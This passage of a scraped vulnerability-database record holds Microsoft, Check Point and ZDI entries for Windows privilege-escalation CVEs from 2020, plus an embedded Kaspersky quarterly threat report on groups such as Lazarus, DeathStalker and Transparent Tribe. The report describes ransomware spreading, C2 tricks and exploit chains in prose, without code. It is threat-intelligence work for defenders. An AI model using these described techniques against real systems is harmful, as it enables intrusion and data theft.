"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1266"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1266", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1266", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1262"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1262", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1262", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1246"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1246", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1246", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1269", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1269", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1307"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1307", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1307", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1237"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1237", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1237", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:14", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Elevation of Privilege (CVE-2020-0986)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-06-16T00:00:00", "id": "CPAI-2020-0521", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T22:04:55", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-19T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-05-19T00:00:00", "id": "ZDI-20-663", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-663/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-11-24T16:20:40", "description": "\n\n## Targeted attacks\n\n### MATA: Lazarus's multi-platform targeted malware framework\n\nThe more sophisticated threat actors are continually developing their TTPs (Tactics, Techniques and Procedures) and the toolsets they use to compromise the systems of their targets. However, malicious toolsets used to target multiple platforms are rare, because they required significant investment to develop and maintain them. In July, we reported the use of an advanced, multi-purpose malware framework developed by the Lazarus group.\n\nWe discovered the first artefacts relating to this framework, dubbed 'MATA' (the authors named their infrastructure 'MataNet') in April 2018. Since then, Lazarus has further developed MATA; and there are now versions for Windows, Linux and macOS operating systems.\n\nThe MATA framework consists of several components, including a loader, an orchestrator (which manages and coordinates the processes once a device is infected) a C&C server and various plugins.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\nLazarus has used MATA to infiltrate the networks of organizations around the world and steal data from customer databases; and, in at least one case, the group has used it to spread ransomware \u2013 you can read more about this in the next section. The victims have included software developers, Internet providers and e-commerce sites; and we detected traces of the group's activities in Poland, Germany, Turkey, Korea, Japan, and India.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\nYou can read more about MATA [here](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>).\n\n### Lazarus on the hunt for big game\n\nTargeted ransomware has been on the increase in recent years. Typically, such attacks are carried out by criminal groups, who license 'as-a-service' ransomware from third-party malware developers and then distribute it by piggy-backing established botnets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160419/sl_lazarus_01.png>)\n\nHowever, earlier this year we discovered a new ransomware family linked to the Lazarus APT group. The [VHD ransomware](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) operates much like other ransomware \u2013 it encrypts files on drives connected to the victim's computer and deletes System Volume Information (used as part of the Windows restore point feature) to prevent recovery of data. The malware also suspends processes that could potentially lock important files, such as Microsoft Exchange or SQL Server. However, the delivery mechanism is more reminiscent of APT campaigns. The spreading utility contains a list of administrative credentials and IP addresses specific to the victim, which is uses to brute-force the SMB service on every discovered computer. Whenever it makes a successful connection, a network share is mounted and the VHD ransomware is copied and executed through WMI calls.\n\nWhile investigating a second incident, we were able to uncover the full infection chain. The malware gained access to a victim's system by exploiting a vulnerable VPN gateway and then obtained administrative rights on the compromised machines. It used these to install a backdoor and take control of the Active Directory server. Then all computers were infected with the VHD ransomware using a loader created specifically for this task.\n\nFurther analysis revealed the backdoor to be part of the MATA framework described above.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160730/sl_lazarus_03.png>)\n\n### WastedLocker\n\n[Garmin, the GPS and aviation specialist, was the victim of a cyber-attack](<https://www.garmin.com/en-US/outage/>) in July that resulted in the encryption of some of its systems. The malware used in the attack was the WastedLocker and you can read our technical analysis of this ransomware [here](<https://securelist.com/wastedlocker-technical-analysis/97944/>).\n\nThis ransomware, the use of which has increased this year, has several noteworthy features. It includes a command line interface that attackers can use to control the way it operates \u2013 specifying directories to target and setting a priority of which files to encrypt first; and controlling the encryption of files on specified network resources. WastedLocker also features a bypass for UAC (User Account Control) on Windows computers that allows the malware to silently elevate its privileges using a known bypass technique.\n\nWastedLocker uses a combination of AES and RSA algorithms to encrypt files, which is a standard for ransomware families. Files are encrypted using a single public RSA key. This would be a weakness if this ransomware were to be distributed in mass attacks, since a decryptor from one victim would have to contain the only private RSA key that could be used to decrypt the files of all victims. However, since WastedLocker is used in attacks targeted at a specific organization, this decryption approach is worthless in real-world scenarios. Encrypted files are given the extension garminwasted_info, \u2013 and unusually, a new info file is created for each of the victim's encrypted files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/31084831/sl_WastedLocker_04.png>)\n\n### CactusPete's updated Bisonal backdoor\n\nCactusPete is a Chinese-speaking APT threat actor that has been active since 2013. The group has typically targeted military, diplomatic and infrastructure victims in Japan, South Korea, Taiwan and the U.S. However, more recently the group has shifted its focus more towards other Asian and Eastern European organizations.\n\nThis group, which we would characterize as having medium level technical capabilities, seems to have acquired greater support and has access to more complex code such as ShadowPad, which CactusPete deployed earlier this year against government, defence, energy, mining and telecoms organizations.\n\nNevertheless, the group continues to use less sophisticated tools. We recently reported the group's use of a [new variant of the Bisonal backdoor](<https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/>) to steal information, execute code on target computers and perform lateral movement within the network. Our research began with a single sample, but using the [Kaspersky Threat Attribution Engine](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>) (KTAE) we discovered more than 300 almost identical samples. All of these appeared between March 2019 and April this year \u2013 so the group has developed more than 20 samples per month! Bisonal is not advanced, relying instead on social engineering in the form of spear-phishing e-mails.\n\n### Operation PowerFall\n\nEarlier this year our technologies prevented an attack on a South Korean company. Our investigation uncovered two zero-day vulnerabilities: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. The exploits targeted the latest builds of Windows 10 and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nThe exploits operated in tandem. The victim was first targeted with a malicious script that, because of the vulnerability, was able to run in Internet Explorer. Then a flaw in the system service further escalated the privileges of the malicious process. As a result, the attackers were able to move laterally across the target network.\n\nWe reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for the elevation of privilege vulnerability (CVE-2020-0986): although, before our discovery, Microsoft hadn't considered exploitation of this vulnerability to be likely. The patch for this vulnerability was released on 9 June. The patch for the remote code vulnerability (CVE-2020-1380) was released on 11 August.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe named this malicious campaign Operation PowerFall. While we have been unable to find a clear link to known threat actors, we believe that DarkHotel might be behind it. You can read more about it [here](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) and [here](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>).\n\n### The latest activities of Transparent Tribe\n\nTransparent Tribe, a prolific threat actor that has been active since at least 2013, specializes in cyber-espionage. The group's main malware is a custom .NET Remote Access Trojan (RAT) called Crimson RAT, spread by means of spear-phishing e-mails containing malicious Microsoft Office documents.\n\nDuring [our investigation into the activities of Transparent Tribe](<https://securelist.com/transparent-tribe-part-1/98127/>), we found around 200 Crimson RAT samples. Kaspersky Security Network (KSN) telemetry indicates that there were more than a thousand victims in the year following June 2019. The main targets were diplomatic and military organizations in India and Pakistan.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19105713/sl_transparent_tribe_20.png>)\n\nCrimson RAT includes a range of functions for harvesting data from infected computers. The latest additions include a server-side component used to manage infected client machines and a USB worm component developed for stealing files from removable drives, spreading across systems by infecting removable media and downloading and executing a thin-client version of Crimson RAT from a remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19101103/sl_transparent_tribe_01.png>)\n\nWe also discovered a [new Android implant used by Transparent Tribe](<https://securelist.com/transparent-tribe-part-2/98233/>) to spy on mobile devices. The threat actor used social engineering to distribute the malware, disguised as a fake porn video player and a fake version of the Aarogya Setu COVID-19 tracking app developed by the government of India.\n\nThe app is a modified version of the AhMyth Android RAT, open source malware, downloadable from GitHub and built by binding a malicious payload inside legitimate apps. The malware is designed to collect information from the victim's device and send it to the attackers.\n\n### DeathStalker: mercenary cybercrime group\n\nIn August, we reported the activities of a cybercrime group that specializes in stealing trade secrets \u2013 mainly from fintech companies, law firms, and financial advisors, although we've also seen an attack on a diplomatic entity. The choice of targets suggests that this group, which we have named DeathStalker, is either looking for specific information to sell, or is a mercenary group offering an 'attack on demand' service. The group has been active since at least 2018; but it's possible that the group's activities could go back further, to 2012, and may be linked to the Janicab and Evilnum malware families.\n\nWe have seen Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the UK and the UAE. We also located Evilnum victims in Cyprus, India, Lebanon, Russia, Jordan and the UAE.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/25072903/Map_Powersing_Evilnum_upd.png>)\n\nThe group's use of a PowerShell implant called Powersing first brought DeathStalker to our attention. The operation starts with spear-phishing e-mails with attached archives containing a malicious LNK file. If the victim clicks on the archive, it starts a convoluted sequence resulting in the execution of arbitrary code on the computer\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145157/sl_decepticons_deathstalker_03.png>)\n\nPowersing periodically takes screenshots on the victim's computer and sends them to the C2 (Command and Control) server. It also executes additional PowerShell scripts that are downloaded from the C2 server. So Powersing is designed to provide the attackers with an initial point of presence on the infected computer from which to install additional malware.\n\nDeathStalker camouflages communication between infected computers and the C2 server by using public services as dead drop resolvers: these services allow the attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145258/sl_decepticons_deathstalker_04.png>)\n\nDeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyber-threat companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.\n\nYou can read more about [DeathStalkers](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) here.\n\n## Other malware\n\n### The Tetrade: Brazilian banking malware goes global\n\nBrazil has a well-established criminal underground and local malware developers have created many banking Trojans over the years. Typically, this malware is used to target customers of local banks. However, Brazilian cybercriminals are starting to expand their attacks and operations abroad, targeting other countries and banks. [The Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>) is our designation for four large banking Trojan families that have been created, developed and spread by Brazilian criminals, but which are now being used at a global level. The four malware families are Guildma, Javali, Melcoz and Grandoreiro.\n\nWe have seen [attempts to do this before](<https://securelist.com/brazilian-trojans-beyond-borders/30879/>), with limited success using very basic Trojans. The situation is now different. Brazilian banking Trojans have evolved greatly, with hackers adopting techniques for bypassing detection, creating highly modular and obfuscated malware and using a very complex execution flow \u2013 making analysis more difficult. Notwithstanding the banking industry's adoption of technologies aimed at protecting customers, including the deployment of plugins, tokens, e-tokens, two-factor authentication, CHIP and PIN credit, fraud continues to increase because Brazil still lacks proper cybercrime legislation.\n\nBrazilian criminals are benefiting from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and in Europe, making it easy to extend their attacks to customers of these financial institutions. They are also rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (Malware-as-a-Service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners.\n\nThe banking Trojan families are seeking to innovate by using DGA (Domain Generation Algorithm), encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks to obstruct analysis and detection. We believe that these threats will evolve to target more banks in more countries.\n\nWe recommend that financial institutions monitor these threats closely, while improving their authentication processes, boosting anti-fraud technology and threat intelligence data to understand and mitigate such risks. Further information on these threats, along with IoCs, YARA rules and hashes, are available to customers of our [Financial Threat Intelligence services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).\n\n### The dangers of streaming\n\nHome entertainment is changing as the adoption of streaming TV services increases. The global market for streaming services is [estimated to reach $688.7 billion by 2024](<https://www.businesswire.com/news/home/20200205005541/en/Global-Video-Streaming-Market-Estimated-Generate-688.7>). For cybercriminals, the widespread adoption of streaming services offers new, potentially lucrative attack vector. For example, just hours after Disney + was launched last November, [thousands of accounts were hacked](<https://www.zdnet.com/article/thousands-of-hacked-disney-accounts-are-already-for-sale-on-hacking-forums/>) and people's passwords and email details were changed. The criminals sold the compromised accounts online for between $3 and $11.\n\nEven established services, such as Netflix and Hulu, are prime targets for distributing malware, [stealing passwords](<https://www.usatoday.com/story/tech/columnist/2019/08/31/did-someone-steal-your-netflix-password/2168504001/>) and launching spam and phishing attacks. The spike in the number of subscribers in the wake of the COVID-19 pandemic has provided cybercriminals with an even bigger pool of potential victims. In the first quarter of this year, [Netflix added fifteen million subscribers](<https://www.theverge.com/2020/4/21/21229587/netflix-earnings-coronavirus-pandemic-streaming-entertainment%5d>)\u2014more than double what had been anticipated.\n\nWe took an [in-depth look at the threat landscape as it relates to streaming services](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>). Unsurprisingly, phishing is one of the approaches taken by cybercriminals, as they seek to trick people into disclosing login credentials or payment information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15124324/sl_tv_report_06.png>)\n\nThe criminals also capitalize on the growing interest in streaming services to distribute malware and adware. Typically, backdoors and other Trojans are downloaded when people attempt to gain access through unofficial means \u2013 by purchasing discounted accounts, obtaining a 'hack' to keep their free trial going, or attempting to access a free subscription. The chart below shows the number of people that encountered various threats containing the names of popular streaming platforms while trying to access these platforms through unofficial means between January 2019 and 8 April 2020:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15134838/01-en-graph-depicting.png>)\n\nThe chart below shows the mix of malicious programs disguised under the name of popular streaming platforms between January 2019 and 8 April 2020:\n\nYou can read the full report [here](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>), including our guidance on how to avoid phishing scams and malware related to streaming services.\n\n### Threats facing digital education\n\nOnline learning became the norm in the wake of the COVID-19 pandemic, as classrooms and lecture theatres were forced to close. Unfortunately, many educational institutions did not have proper cyber-security measures in place, putting online classrooms at increased risks of cyber-attacks. On 17 June, Microsoft Security Intelligence reported that the [education industry accounted for 61 percent of the 7.7 million malware encounters by enterprises](<https://edtechmagazine.com/k12/article/2020/06/cyberattacks-increasingly-threaten-schools-heres-what-know-perfcon>) in the previous 30 days \u2013 more than any other sector. In addition to malware, educational institutions also faced an increased risk of data breaches and violations of student privacy.\n\nWe recently published an overview of the threats facing schools and universities, including phishing related to online learning platforms and video conferencing applications, threats camouflaged as applications related to online learning and DDoS (Distributed Denial of Service) attacks affecting education.\n\nIn the first half of 2020, 168,550 people encountered various threats disguised as popular online learning platforms \u2013 a massive increase compared to just 820 in the same period the previous year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104901/02-en-education-report.png>)\n\nThe platform used most frequently as a lure was Zoom, with 99.5 per cent of detections, no surprise given the popularity of this platform.\n\nThe overwhelming majority of threats distributed under the guise of legitimate video conferencing and online learning platforms were riskware and adware. Adware bombards users with unwanted adverts, while riskware consists of various files \u2013 including browser bars, download managers and remote administration tools \u2013 that may carry out various actions without consent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104938/03-en-education-report.png>)\n\nIn Q1 2020, the total number of DDoS attacks increased globally by 80 per cent when compared to the same period in 2019: and a large proportion of this increase can be attributed to attacks on distance e-learning services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03105019/04-en-education-report.png>)\n\nThe number of DDoS attacks affecting educational resources that occurred between January and June this year increased by at least 350 per cent when compared to the same period in 2019.\n\nIt's likely that online learning will continue to grow in the future and cybercriminals will seek to exploit this. So it's vital that educational institutions review their cyber-security policy and adopt appropriate measures to secure their online learning environments and resources.\n\nYou can read our full report [here](<https://securelist.com/digital-education-the-cyberrisks-of-the-online-classroom/98380/>).\n\n### Undeletable adware on smartphones\n\nWe've highlighted the issue of intrusive advertisements on smartphones a number of times in the past (you can find recent posts [here](<https://securelist.com/dropper-in-google-play/92496/>) and [here](<https://securelist.com/in-app-advertising-in-android/97065/>)). While it can be straightforward to remove [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), there are situations where it's much more difficult because the [adware is installed in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). In such cases, trying to remove it can cause the device to fail. In addition, ads can be embedded in undeletable system apps and libraries at the code level. According to our data, 14.8 per cent of all users attacked by malware or adware in the last year suffered an infection of the system partition.\n\nWe have observed two main strategies for introducing undeletable adware onto a device. First, the malware obtains root access and [installs adware in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). Second, the code for displaying ads (or its loader) gets into the firmware of the device even before reaches the consumer. Our data indicates that between one and 5 per cent people running our mobile security solutions have encountered this. In the main, these are owners of smartphones and tablets of certain brands in the lower price segment. For some popular vendors offering low-cost devices, this figure reaches 27 per 